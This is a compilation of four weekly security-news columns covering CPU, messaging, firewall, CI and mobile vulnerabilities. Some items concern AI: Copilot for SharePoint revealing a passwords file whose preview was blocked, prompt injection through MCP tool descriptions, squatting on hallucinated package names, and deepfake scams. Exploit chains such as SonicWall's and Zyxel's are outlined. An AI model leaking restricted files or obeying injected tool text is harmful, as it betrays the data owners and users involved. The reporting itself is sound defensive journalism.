This Week in Security: Lingering Spectre, Deep Fakes, and CoreAudio

Spectre lives. We’ve got two separate pieces of research, each finding new processor primitives that allow Spectre-style memory leaks. Before we dive into the details of the new techniques, let’s quickly remind ourselves what Spectre is. Modern CPUs use a variety of clever tricks to execute code faster, and one of the stumbling blocks is memory latency. When a program reaches a branch in execution, the program will proceed in one of two possible directions, and it’s often a value from memory that determines which branch is taken. Rather than wait for the memory to be fetched, modern CPUs will predict which branch execution will take, and speculatively execute the code down that branch. Once the memory is fetched and the branch is properly evaluated, the speculatively executed code is rewound if the guess was wrong, or made authoritative if the guess was correct. Spectre is the realization that incorrect branch prediction can change the contents of the CPU cache, and those changes can be detected through cache timing measurements. The end result is that arbitrary system memory can be leaked from a low privileged or even sandboxed user process.

In response to Spectre, OS developers and CPU designers have added domain isolation protections, that prevent branch prediction poisoning in an attack process from affecting the branch prediction in the kernel or another process. Training Solo is the clever idea from VUSec that branch prediction poisoning could just be done from within the kernel space, and avoid any domain switching at all. That can be done through cBPF, the classic Berkeley Packet Filter (BPF) kernel VM. By default, all users on a Linux system can run cBPF code, throwing the doors back open for Spectre shenanigans. There’s also an address collision attack where an unrelated branch can be used to train a target branch. Researchers also discovered a pair of CVEs in Intel’s CPUs, where prediction training was broken in specific cases, allowing for a wild 17 kB/sec memory leak.

Also revealed this week is the Branch Privilege Injection research from COMSEC. This is the realization that Intel Branch Prediction happens asynchronously, and in certain cases there is a race condition between the updates to the prediction engine, and the code being predicted. In short, user-mode branch prediction training can be used to poison kernel-mode prediction, due to the race condition.

(Editor’s note: Video seems down for the moment. Hopefully YouTube will get it cleared again soon. Something, something “hackers”.)

Both of these Spectre attacks have been patched by Intel with microcode, and the Linux kernel has integrated patches for the Training Solo issue. Training Solo may also impact some ARM processors, and ARM has issued guidance on the vulnerability. The real downside is that each fix seems to come with yet another performance hit.

Is That Real Cash? And What Does That Even Mean?

Over at the Something From Nothing blog, we have a surprisingly deep topic, in a teardown of banknote validators. For the younger in the audience, there was a time in years gone by where not every vending machine had a credit card reader built-in, and the only option was to carefully straighten a bill and feed it into the bill slot on the machine. Bow how do those machines know it’s really a bill, and not just the right sized piece of paper?

And that’s where this gets interesting. Modern currency has multiple security features in a single bill, like magnetic ink, micro printing, holograms, watermarks, and more. But how does a bill validator check for all those things? Mainly LEDs and photodetectors, it seems. With some machines including hall effect sensors, magnetic tape heads for detecting magnetic ink, and in rare cases a full linear CCD for scanning the bill as it’s inserted. Each of those detectors (except the CCD) produces a simple data stream from each bill that’s checked. Surely it would be easy enough to figure out the fingerprint of a real bill, and produce something that looks just like the real thing — but only to a validator?

In theory, probably, but the combination of sensors presents a real problem. It’s really the same problem with counterfeiting a bill in general: implementing a single security feature is doable, but getting them all right at the same time is nearly impossible. And so with the humble banknote validator.

Don’t Trust That Phone Call

There’s a scam that has risen to popularity with the advent of AI voice impersonation. It usually takes the form of a young person calling a parent or grandparent from jail or a hospital, asking for money to be wired to make it home. It sounds convincing, because it’s an AI deepfake of the target’s loved one. This is no longer just a technique to take advantage of loving grandparents. The FBI has issued a warning about an ongoing campaign using deepfakes of US officials. The aim of this malware campaign seems to be just getting the victim to click on a malicious link. This same technique was used in a LastPass attack last year, and the technique has become so convincing, it’s not likely to go away anytime soon.

AI Searching SharePoint

Microsoft has tried not to be left behind in the current flurry of AI rollouts that every tech company seems to be engaging in. Microsoft’s SharePoint is not immune, and the result is Microsoft Copilot for SharePoint. This gives an AI agent access to a company’s SharePoint knowledge base, allowing users to query it for information. It’s AI as a better search engine. This has some ramifications for security, as SharePoint installs tend to collect sensitive data.

The first ramification is the most straightforward. The AI can be used to search for that sensitive data. But Copilot pulling data from a SharePoint file doesn’t count as a view, making for a very stealthy way to pull data from those sensitive files. Pen Test Partners found something even better on a real assessment. A passwords file hosted on SharePoint was unavailable to view, but in an odd way. This file hadn’t been locked down using SharePoint permissions, but instead the file was restricted from previewing in the browser. This was likely an attempt to keep eyes off the contents of the file. And Copilot was willing to be super helpful, pasting the contents of that file right into a chat window. Whoops.

Fuzzing Apple’s CoreAudio

Googler [Dillon Franke] has the story of finding a type confusion flaw in Apple’s CoreAudio daemon, reachable via Mach Inter-Process Communication (IPC) messages, allowing for potential arbitrary code execution from within a sandboxed process. This is a really interesting fuzzing + reverse engineering journey, and it starts with imagining the attack he wanted to find: Something that could be launched from within a sandboxed browser, take advantage of already available IPC mechanisms, and exploit a complex process with elevated privileges.

Coreaudiod ticks all the boxes, but it’s a closed source daemon. How does one approach this problem? The easy option is to just fuzz over the IPC messages. It would be a perfectly viable strategy, to fuzz CoreAudio via Mach calls. The downside is that the fuzzer would run slower, and have much less visibility into what’s happening in the target process. A much more powerful approach is to build a fuzzing harness that allows hooking directly to the library in question. There is some definite library wizardry at play here, linking into a library function that hasn’t been exported.

The vulnerability that he found was type confusion, where the daemon expected an ioctl object, but could be supplied arbitrary data. As an ioctl object contains a pointer to a vtable, which is essentially a collection of function pointers. It then attempts to call a function from that table. It’s an ideal situation for exploitation. The fix from Apple is an explicit type check on the incoming objects.

Bits and Bytes

Asus publishes the DriverHub tool, a gui-less driver updater. It communicates with driverhub.asus.com using RPC calls. The problem is that it checks for the right web URL using a wildcard, and driverhub.asus.com.mrbruh.com was considered completely valid. Among the functions DriverHub can perform is to install drivers and updates. Chaining a couple of fake updates together results in relatively easy admin code execution on the local machine, with the only prerequisites being the DriverHub software being installed, and clicking a single malicious link. Ouch.

The VirtualBox VGA driver just patched a buffer overflow that could result in VM escape. The vmsvga3dSurfaceMipBufferSize call could be manipulated so no memory is actually allocated, but VirtualBox itself believes a buffer is there and writable. This memory write ability can be leveraged into arbitrary memory read and write capability on the host system.

And finally, what’s old is new again. APT28, a Russian state actor, has been using very old-school Cross Site Scripting (XSS) attacks to gain access to target’s webmail systems. The attack here is JavaScript in an email’s HTML code. That JS then used already known XSS exploits to exfiltrate emails and contacts. The worst part of this campaign is how low-effort it was. These aren’t cutting-edge 0-days. Instead, the target’s email servers just hadn’t been updated. Keep your webmail installs up to date!

This Week in Security: Encrypted Messaging, NSO’s Judgement, and AI CVE DDoS

Cryptographic messaging has been in the news a lot recently. Like the formal audit of WhatsApp (the actual PDF). And the results are good. There are some minor potential problems that the audit highlights, but they are of questionable real-world impact. The most consequential is how easy it is to add additional members to a group chat. Or to put it another way, there are no cryptographic guarantees associated with adding a new user to a group.

The good news is that WhatsApp groups don’t allow new members to read previous messages. So a user getting added to a group doesn’t reveal historic messages. But a user added without being noticed can snoop on future messages. There’s an obvious question, as to how this is a weakness. Isn’t it redundant, since anyone with the permission to add someone to a group, can already read the messages from that group?

That’s where the lack of cryptography comes in. To put it simply, the WhatsApp servers could add users to groups, even if none of the existing users actually requested the addition. It’s not a vulnerability per se, but definitely a design choice to keep in mind. Keep an eye on the members in your groups, just in case.

The Signal We Have at Home

The TeleMessage app has been pulled from availability, after it was used to compromise Signal communications of US government officials. There’s political hay to be made out of the current administration’s use and potential misuse of Signal, but the political angle isn’t what we’re here for. The TeleMessage client is Signal compatible, but adds message archiving features. Government officials and financial companies were using this alternative client, likely in order to comply with message retention laws.

While it’s possible to do long term message retention securely, TeleMessage was not doing this particularly well. The messages are stripped of their end-to-end encryption in the client, before being sent to the archiving server. It’s not clear exactly how, but those messages were accessed by a hacker. This nicely demonstrates the inherent tension between the need for transparent archiving as required by the US government for internal communications, and the need for end-to-end encryption.

The NSO Judgement

WhatsApp is in the news for another reason, this time winning a legal judgement against NSO Group for their Pegasus spyware. The $167 Million in damages casts real doubt on the idea that NSO has immunity to develop and deploy malware, simply because it’s doing so for governments. This case is likely to be appealed, and higher courts may have a different opinion on this key legal question, so hold on. Regardless, the era of NSO’s nearly unrestricted actions is probably over. They aren’t the only group operating in this grey legal space, and the other “legal” spyware/malware vendors are sure to be paying attention to this ruling as well.

The $5 Wrench

In reality, the weak point of any cryptography scheme is the humans using it. We’re beginning to see real world re-enactments of the famous XKCD $5 wrench, that can defeat even 4096-bit RSA encryption. In this case, it’s the application of old crime techniques to new technology like cryptocurrency. To quote Ars Technica:

We have reached the “severed fingers and abductions” stage of the crypto revolution

The flashy stories involve kidnapping and torture, but let’s not forget that the most common low-tech approach is simple deception. Whether you call it the art of the con, or social engineering, this is still the most likely way to lose your savings, whether it’s conventional or a cryptocurrency.

The SonicWall N-day

WatchTowr is back with yet another reverse-engineered vulnerability. More precisely, it’s two CVEs that are being chained together to achieve pre-auth Remote Code Execution (RCE) on SonicWall appliances. This exploit chain has been patched, but not everyone has updated, and the vulnerabilities are being exploited in the wild.

The first vulnerability at play is actually from last year, and is in Apache’s mod_rewrite module. This module is widely used to map URLs to source files, and it has a filename confusion issue where a url-encoded question mark in the path can break the mapping to the final filesystem path. A second issue is that when DocumentRoot is specified, instances of RewriteRule take on a weird dual-meaning. The filesystem target refers to the location inside DocumentRoot, but it first checks for that location in the filesystem root itself. This was fixed in Apache nearly a year ago, but it takes time for patches to roll out.

SonicWall was using a rewrite rule to serve CSS files, and the regex used to match those files is just flexible enough to be abused for arbitrary file read. /mnt/ram/var/log/httpd.log%3f.1.1.1.1a-1.css matches that rule, but includes the url-encoded question mark, and matches a location on the root filesystem. There are other, more interesting files to access, like the temp.db SQLite database, which contains session keys for the currently logged in users.

The other half of this attack is a really clever command injection using one of the diagnostic tools included in the SonicWall interface. Traceroute6 is straightforward, running a traceroute6 command and returning the results. It’s also got good data sanitization, blocking all of the easy ways to break out of the traceroute command and execute some arbitrary code. The weakness is that while this sanitization adds backslashes to escape quotes and other special symbols, it stores the result in a fixed-length result buffer. If the result of this escaping process overflows the result buffer, it writes over the null terminator and into the buffer that holds the original command before it’s sanitized. This overflow is repeated when the command is run, and with some careful crafting, this results in escaping the sanitization and including arbitrary commands. Clever.

The AI CVE DDoS

[Daniel Stenberg], lead developer of curl, is putting his foot down. We’ve talked about this before, even chatting with Daniel about the issue when we had him on FLOSS Weekly. Curl’s bug bounty project has attracted quite a few ambitious people, that don’t actually have the skills to find vulnerabilities in the curl codebase. Instead, these amateur security researchers are using LLMs to “find vulnerabilities”. Spoiler, LLMs aren’t yet capable of this task. But LLMs are capable of writing fake vulnerability reports that look very convincing at first read. The game is usually revealed when the project asks a question, and the fake researcher feeds the LLM response back into the bug report.

This trend hasn’t slowed, and the curl project is now viewing the AI generated vulnerability reports as a form of DDoS. In response, the curl Hackerone bounty program will soon ask a question with every entry: “Did you use an AI to find the problem or generate this submission?” An affirmative answer won’t automatically disqualify the report, but it definitely puts the burden on the reporter to demonstrate that the flaw is real and wasn’t hallucinated. Additionally, “AI slop” reports will result in permanent bans for the reporter.

It’s good to see that not all AI content is completely disallowed, as it’s very likely that LLMs will be involved in finding and describing vulnerabilities before long. Just not in this naive way, where a single prompt results in a vulnerability find and generates a patch that doesn’t even apply. Ironically, one of the tells of an AI generated report is that it’s too perfect, particularly for someone’s first report. AI is still the hot new thing, so this issue likely isn’t going away any time soon.

Bits and Bytes

A supply chain attack has been triggered against several hundred Magento e-commerce sites, via at least three software vendors distributing malicious code. One of the very odd elements to this story is that it appears this malicious code has been incubating for six years, and only recently invoked for malicious behavior.

On the WordPress side of the fence, the Ottokit plugin was updated last month to fix a critical vulnerability. That update was force pushed to the majority of WordPress sites running that plugin, but that hasn’t stopped threat actors from attempting to use the exploit, with the first attempts coming just an hour and a half after disclosure.

It turns out it’s probably not a great idea to allow control codes as part of file names. Portswigger has a report of a couple ways VS Code can do the wrong thing with such filenames.

And finally, this story comes with a disclaimer: Your author is part of Meshtastic Solutions and the Meshtastic project. We’ve talked about Meshtastic a few times here on Hackaday, and would be remiss not to point out CVE-2025-24797. This buffer overflow could theoretically result in RCE on the node itself. I’ve seen at least one suggestion that this is a wormable vulnerability, which may be technically true, but seems quite impractical in practice. Upgrade your nodes to at least release 2.6.2 to get the fix.

This Week in Security: AirBorne, EvilNotify, and Revoked RDP

This week, Oligo has announced the AirBorne series of vulnerabilities in the Apple Airdrop protocol and SDK. This is a particularly serious set of issues, and notably affects MacOS desktops and laptops, the iOS and iPadOS mobile devices, and many IoT devices that use the Apple SDK to provide AirPlay support. It’s a group of 16 CVEs based on 23 total reported issues, with the ramifications ranging from an authentication bypass, to local file reads, all the way to Remote Code Execution (RCE).

AirPlay is a WiFi based peer-to-peer protocol, used to share or stream media between devices. It uses port 7000, and a custom protocol that has elements of both HTTP and RTSP. This scheme makes heavy use of property lists (“plists”) for transferring serialized information. And as we well know, serialization and data parsing interfaces are great places to look for vulnerabilities. Oligo provides an example, where a plist is expected to contain a dictionary object, but was actually constructed with a simple string. De-serializing that plist results in a malformed dictionary, and attempting to access it will crash the process.

Another demo is using AirPlay to achieve an arbitrary memory write against a MacOS device. Because it’s such a powerful primative, this can be used for zero-click exploitation, though the actual demo uses the music app, and launches with a user click. Prior to the patch, this affected any MacOS device with AirPlay enabled, and set to either “Anyone on the same network” or “Everyone”. Because of the zero-click nature, this could be made into a wormable exploit.

Apple has released updates for their products for all of the CVEs, but what’s going to really take a long time to clean up is the IoT devices that were build with the vulnerable SDK. It’s likely that many of those devices will never receive updates.

EvilNotify

It’s apparently the week for Apple exploits, because here’s another one, this time from [Guilherme Rambo]. Apple has built multiple systems for doing Inter Process Communications (IPC), but the simplest is the Darwin Notification API. It’s part of the shared code that runs on all of Apple’s OSs, and this IPC has some quirks. Namely, there’s no verification system, and no restrictions on which processes can send or receive messages.

That led our researcher to ask what you may be asking: does this lack of authentication allow for any security violations? Among many novel notifications this technique can spoof, there’s one that’s particularly problematic: The device “restore in progress”. This locks the device, leaving only a reboot option. Annoying, but not a permanent problem.

The really nasty version of this trick is to put the code triggering a “restore in progress” message inside an app’s widget extension. iOS loads those automatically at boot, making for an infuriating bootloop. [Guilherme] reported the problem to Apple, made a very nice $17,500 in the progress. The fix from Apple is a welcome surprise, in that they added an authorization mechanism for sensitive notification endpoints. It’s very likely that there are other ways that this technique could have been abused, so the more comprehensive fix was the way to go.

Jenkins

Continuous Integration is one of the most powerful tools a software project can use to stay on top of code quality. Unfortunately as those CI toolchains get more complicated, they are more likely to be vulnerable, as [John Stawinski] from Praetorian has discovered. This attack chain would target the Node.js repository at Github via an outside pull request, and ends with code execution on the Jenkins host machines.

The trick to pulling this off is to spoof the timestamp on a Pull Request. The Node.js CI uses PR labels to control what CI will do with the incoming request. Tooling automatically adds the “needs-ci” label depending on what files are modified. A maintainer reviews the PR, and approves the CI run. A Jenkins runner will pick up the job, compare that the Git timestamp predated the maintainer’s approval, and then runs the CI job. Git timestamps are trivial to spoof, so it’s possible to load an additional commit to the target PR with a commit timestamp in the past. The runner doesn’t catch the deception, and runs the now-malicious code.

[John] reported the findings, and Node.js maintainers jumped into action right away. The primary fix was to do SHA sum comparisons to validate Jenkins runs, rather than just relying on timestamp. Out of an abundance of caution, the Jenkins runners were re-imaged, and then [John] was invited to try to recreate the exploit. The Node.js blog post has some additional thoughts on this exploit, like pointing out that it’s a Time-of-Check-Time-of-Use (TOCTOU) exploit. We don’t normally think of TOCTOU bugs where a human is the “check” part of the equation.

2024 in 0-days

Google has published an overview of the 75 zero-day vulnerabilities that were exploited in 2024. That’s down from the 98 vulnerabilities exploited in 2023, but the Threat Intelligence Group behind this report are of the opinion that we’re still on an upward trend for zero-day exploitation. Some platforms like mobile and web browsers have seen drastic improvements in zero-day prevention, while enterprise targets are on the rise. The real stand-out is the targeting of security appliances and other network devices, at more than 60% of the vulnerabilities tracked.

When it comes to the attackers behind exploitation, it’s a mix between state-sponsored attacks, legal commercial surveillance, and financially motivated attacks. It will be interesting to see how 2025 stacks up in comparison. But one thing is for certain: Zero-days aren’t going away any time soon.

Perplexing Passwords for RDP

The world of computer security just got an interesting surprise, as Microsoft declared it not-a-bug that Windows machines will continue to accept revoked credentials for Remote Desktop Protocol (RDP) logins. [Daniel Wade] discovered the issue and reported it to Microsoft, and then after being told it wasn’t a security vulnerability, shared his report with Ars Technica.

So what exactly is happening here? It’s the case of a Windows machine login via Azure or a Microsoft account. That account is used to enable RDP, and the machine caches the username and password so logins work even when the computer is “offline”. The problem really comes in how those cached passwords get evicted from the cache. When it comes to RDP logins, it seems they are simply never removed.

There is a stark disconnect between what [Wade] has observed, and what Microsoft has to say about it. It’s long been known that Windows machines will cache passwords, but that cache will get updated the next time the machine logs in to the domain controller. This is what Microsoft’s responses seem to be referencing. The actual report is that in the case of RDP, the cached passwords will never expire, regardless of changing that password in the cloud and logging on to the machine repeatedly.

Bits and Bytes

Samsung makes a digital signage line, powered by the MagicINFO server application. That server has an unauthenticated endpoint, accepting file uploads with insufficient filename sanitization. That combination leads to arbitrary pre-auth code execution. While that’s not great, what makes this a real problem is that the report was first sent to Samsung in January, no response was ever received, and it seems that no fixes have officially been published.

A series of Viasat modems have a buffer overflow in their SNORE web interface. This leads to unauthenticated, arbitrary code execution on the system, from either the LAN or OTA interface, but thankfully not from the public Internet itself. This one is interesting in that it was found via static code analysis.

IPv6 is the answer to all of our IPv4 induced woes, right? It has Stateless Address Autoconfiguration (SLAAC) to handle IP addressing without DHCP, and Router Advertisement (RA) to discover how to route packets. And now, taking advantage of that great functionality is Spellbinder, a malicious tool to pull off SLACC attacks and do DNS poisoning. It’s not entirely new, as we’ve seen Man in the Middle attacks on IPv4 networks for years. IPv6 just makes it so much easier.

This Week in Security: XRP Poisoned, MCP Bypassed, and More

Researchers at Aikido run the Aikido Intel system, an LLM security monitor that ingests the feeds from public package repositories, and looks for anything unusual. In this case, the unusual activity was five rapid-fire releases of the xrpl package on NPM. That package is the XRP Ledger SDK from Ripple, used to manage keys and build crypto wallets. While quick point releases happen to the best of developers, these were odd, in that there were no matching releases in the source GitHub repository. What changed in the first of those fresh releases?

The most obvious change is the checkValidityOfSeed() function added to index.ts. That function takes a string, and sends a request to a rather odd URL, using the supplied string as the ad-referral header for the HTML request. The name of the function is intended to blend in, but knowing that the string parameter is sent to a remote web server is terrifying. The seed is usually the root of trust for an individual’s cryptocurrency wallet. Looking at the actual usage of the function confirms, that this code is stealing credentials and keys.

The releases were made by a Ripple developer’s account. It’s not clear exactly how the attack happened, though credential compromise of some sort is the most likely explanation. Each of those five releases added another bit of malicious code, demonstrating that there was someone with hands on keyboard, watching what data was coming in.

The good news is that the malicious releases only managed a total of 452 downloads for the few hours they were available. A legitimate update to the library, version 4.2.5, has been released. If you’re one of the unfortunate 452 downloads, it’s time to do an audit, and rotate the possibly affected keys.

Zyxel FLEX

More specifically, we’re talking about Zyxel’s USG FLEX H series of firewall/routers. This is Zyxel’s new Arm64 platform, running a Linux system they call Zyxel uOS. This series is for even higher data throughput, and given that it’s a new platform, there are some interesting security bugs to find, as discovered by [Marco Ivaldi] of hn Security and [Alessandro Sgreccia] at 0xdeadc0de. Together they discovered an exploit chain that allows an authenticated user with VPN access only to perform a complete device takeover, with root shell access.

The first bug is a wild one, and is definitely something for us Linux sysadmins to be aware of. How do you handle a user on a Linux system, that you don’t want to have SSH access to the system shell? I’ve faced this problem when a customer needed SFTP access to a web site, but definitely didn’t need to run bash commands on the server. The solution is to set the user’s shell to nologin, so when SSH connects and runs the shell, it prints a message, and ends the shell, terminating the SSH connection. Based on the code snippet, the FLEX is doing something similar, perhaps with -false set as the shell instead:

$ ssh user@192.168.169.1
(user@192.168.169.1) Password:
-false: unknown program '-false'
Try '-false --help' for more information.
Connection to 192.168.169.1 closed.

It’s slightly janky, but seems set up correctly, right? There’s one more step to do this completely: Add a Match entry to sshd_config, and disable some of the other SSH features you may not have thought about, like X11 forwarding, and TCP forwarding. This is the part that Zyxel forgot about. VPN-only users can successfully connect over SSH, and the connection terminates right away with the invalid shell, but in that brief moment, TCP traffic forwarding is enabled. This is an unintended security domain transverse, as it allows the SSH user to redirect traffic into internal-only ports.

Next question to ask, is there any service running inside the appliance that provides a pivot point? How about PostgreSQL? This service is set up to allow local connections on port 5432 — without a password. And PostgreSQL has a wonderful feature, allowing a COPY FROM command to specify a function to run using the system shell. It’s essentially arbitrary shell execution as a feature, but limited to the PostgreSQL user. It’s easy enough to launch a reverse shell to have ongoing shell access, but still limited to the PostgreSQL user account.

There are a couple directions exploitation can go from there. The /tmp/webcgi.log file is accessible, which allows for grabbing an access token from a logged-in admin. But there’s an even better approach, in that the unprivileged user can use the system’s Recovery Manager to download system settings, repack the resulting zip with a custom binary, re-upload the zip using Recovery Manager, and then interact with the uploaded files. A clever trick is to compile a custom binary that uses the setuid(0) system call, and because Recovery Manager writes it out as root, with the setuid bit set, it allows any user to execute it and jump straight to root. Impressive.

Power Glitching an STM32

Micro-controllers have a bit of a weird set of conflicting requirements. They need to be easily flashed, and easily debugged for development work. But once deployed, those same chips often need to be hardened against reading flash and memory contents. Chips like the STM32 series from ST Microelectronics have multiple settings to keep chip contents secure. And Anvil Secure has some research on how some of those protections could be defeated. Power Glitching.

The basic explanation is that these chips are only guaranteed to work when run inside their specified operating conditions. If the supply voltage is too low, be prepared for unforeseen consequences. Anvil tried this, and memory reads were indeed garbled. This is promising, as the memory protection settings are read from system memory during the boot process. In fact, one of the hardest challenges to this hack was determining the exact timing needed to glitch the right memory read. Once that was nailed down, it took about 6 hours of attempts and troubleshooting to actually put the embedded system into a state where firmware could be extracted.

MCP Line Jumping

Trail of Bits is starting a series on MCP security. This has echoes of the latest FLOSS Weekly episode, talking about agentic AI and how Model Context Protocol (MCP) is giving LLMs access to tools to interact with the outside world. The security issue covered in this first entry is Line Jumping, also known as tool poisoning.

It all boils down to the fact that MCPs advertise the tools that they make available. When an LLM client connects to that MCP, it ingests that description, to know how to use the tool. That description is an opportunity for prompt injection, one of the outstanding problems with LLMs.

Bits and Bytes

Korean SK Telecom has been hacked, though not much information is available yet. One of the notable statements is that SK Telecom is offering customers a free SIM swapping protection service, which implies that a customer database was captured, that could be used for SIM swapping attacks.

WatchTowr is back with a simple pre-auth RCE in Commvault using a malicious zip upload. It’s a familiar story, where an unauthenticated endpoint can trigger a file download from a remote server, and file traversal bugs allow unzipping it in an arbitrary location. Easy win.

SSD Disclosure has discovered a pair of Use After Free bugs in Google Chrome, and Chrome’s Miracleptr prevents them from becoming actual exploits. That technology is a object reference count, and “quarantining” deleted objects that still show active references. And for these particular bugs, it worked to prevent exploitation.

And finally, [Rohan] believes there’s an argument to be made, that the simplicity of ChaCha20 makes it a better choice as a symmetric encryption primitive than the venerable AES. Both are very well understood and vetted encryption standards, and ChaCha20 even manages to do it with better performance and efficiency. Is it time to hang up AES and embrace ChaCha20?

This Week in Security: No More CVEs, 4chan, and Recall Returns

The sky is falling. Or more specifically, it was about to fall, according to the security community this week. The MITRE Corporation came within a hair’s breadth of running out of its contract to maintain the CVE database. And admittedly, it would be a bad thing if we suddenly lost updates to the central CVE database. What’s particularly interesting is how we knew about this possibility at all. An April 15 letter sent to the CVE board warned that the specific contract that funds MITRE’s CVE and CWE work was due to expire on the 16th. This was not an official release, and it’s not clear exactly how this document was leaked.

Many people made political hay out of the apparent imminent carnage. And while there’s always an element of political maneuvering when it comes to contract renewal, it’s worth noting that it’s not unheard of for MITRE’s CVE funding to go down to the wire like this. We don’t know how many times we’ve been in this position in years past. Regardless, MITRE has spun out another non-profit, The CVE Foundation, specifically to see to the continuation of the CVE database. And at the last possible moment, CISA has announced that it has invoked an option in the existing contract, funding MITRE’s CVE work for another 11 months.

Android Automatic Reboots

Mobile devices are in their most secure state right after boot, before the user password is entered to unlock the device for the first time. Tools like Cellebrite will often work once a device has been unlocked once, but just can’t exploit a device in the first booted state. This is why Google is rolling out a feature, where Android devices that haven’t been unlocked for three days will automatically reboot.

Once a phone is unlocked, the encryption keys are stored in memory, and it only takes a lock screen bypass to have full access to the device. But before the initial unlock, the device is still encrypted, and the keys are safely stored in the hardware security module. It’s interesting that this new feature isn’t delivered as an Android OS update, but as part of the Google Play Services — the closed source libraries that run on official Android phones.

4chan

4chan has been hacked. It turns out, running ancient PHP code and out-of-date libraries on a controversial site is not a great idea. A likely exploit chain has been described, though this should be considered very unofficial at this point: Some 4chan boards allow PDF uploads, but the server didn’t properly vet those files. A PostScript file can be uploaded instead of a PDF, and an old version of Ghostscript processes it. The malicious PostScript file triggers arbitrary code execution in Ghostscript, and a SUID binary is used to elevate privileges to root.

PHP source code of the site has been leaked, and the site is still down as of the time of writing. It’s unclear how long restoration will take. Part of the fallout from this attack is the capture and release of internal discussions, pictures of the administrative tools, and even email addresses from the site’s administration.

Recall is Back

Microsoft is back at it, working to release Recall in a future Windows 11 update. You may remember our coverage of this, castigating the security failings, and pointing out that Recall managed to come across as creepy. Microsoft wisely pulled the project before rolling it out as a full release.

If you’re not familiar with the Recall concept, it’s the automated screenshotting of your Windows machine every few seconds. The screenshots are then locally indexed with an LLM, allowing for future queries to be run against the data. And once the early reviewers got over the creepy factor, it turns out that’s genuinely useful sometimes.

On top of the security hardening Microsoft has already done, this iteration of Recall is an opt-in service, with an easy pause button to temporarily disable the snapshot captures. This is definitely an improvement. Critics are still sounding the alarm, but for a much narrower problem: Recall’s snapshots will automatically extract information from security focused applications. Think about Signal’s disappearing messages feature. If you send such a message to a desktop user, that has Recall enabled, the message is likely stored in that user’s Recall database.

It seems that Microsoft has done a reasonably good job of cleaning up the Recall feature, particularly by disabling it by default. It seems like the privacy issues could be furthered addressed by giving applications and even web pages a way to opt out of Recall captures, so private messages and data aren’t accidentally captured. As Recall rolls out, do keep in mind the potential extra risks.

16,000 Symlinks

It’s been recently discovered that over 16,000 Fortinet devices are compromised with a trivial backdoor, in the form of a symlink making the root filesystem available inside the web-accessible language folder. This technique is limited to devices that have the SSL VPN enabled. That system exposes a web interface, with multiple translation options. Those translation files live in a world-accessible folder on the web interface, and it makes for the perfect place to hide a backdoor like this one. It’s not a new attack, and Fortinet believes the exploited devices have harbored this backdoor since the 2023-2024 hacking spree.

Vibes

We’re a little skeptical on the whole vibe coding thing. Our own [Tyler August] covered one of the reasons why. LLMs are likely to hallucinate package names, and vibe coders may not check closely, leading to easy typosquatting (LLMsquatting?) attacks. Figure out the likely hallucinated names, register those packages, and profit.

But what about Vibe Detections? OK, we know, letting an LLM look at system logs for potentially malicious behavior isn’t a new idea. But [Claudio Contin] demonstrates just how easy it can be, with the new EDV tool. Formally not for production use, this new gadget makes it easy to take Windows system events, and feed them into Copilot, looking for potentially malicious activity. And while it’s not perfect, it did manage to detect about 40% of the malicious tests that Windows Defender missed. It seems like LLMs are going to stick around, and this might be one of the places they actually make sense.

Bits and Bytes

Apple has pushed updates to their entire line, fixing a pair of 0-day vulnerabilities. The first is a wild vulnerability in CoreAudio, in that playing audio from a malicious audio file can lead to arbitrary code execution. The chaser is the flaw in the Pointer Authentication scheme, that Apple uses to prevent memory-related vulnerabilities. Apple has acknowledged that these flaws were used in the wild, but no further details have been released.

The Gnome desktop has an interesting problem, where the yelp help browser can be tricked into reading the contents of arbitrary filesystem files. Combined with the possibility of browser links automatically opening in yelp, this makes for a much more severe problem than one might initially think.

And for those of us following along with Google Project Zero’s deep dive into the Windows Registry, part six of that series is now available. This installment dives into actual memory structures, as well as letting us in on the history of why the Windows registry is called the hive and uses the 0xBEE0BEE0 signature. It’s bee themed, because one developer hated bees, and another developer thought it would be hilarious.

❌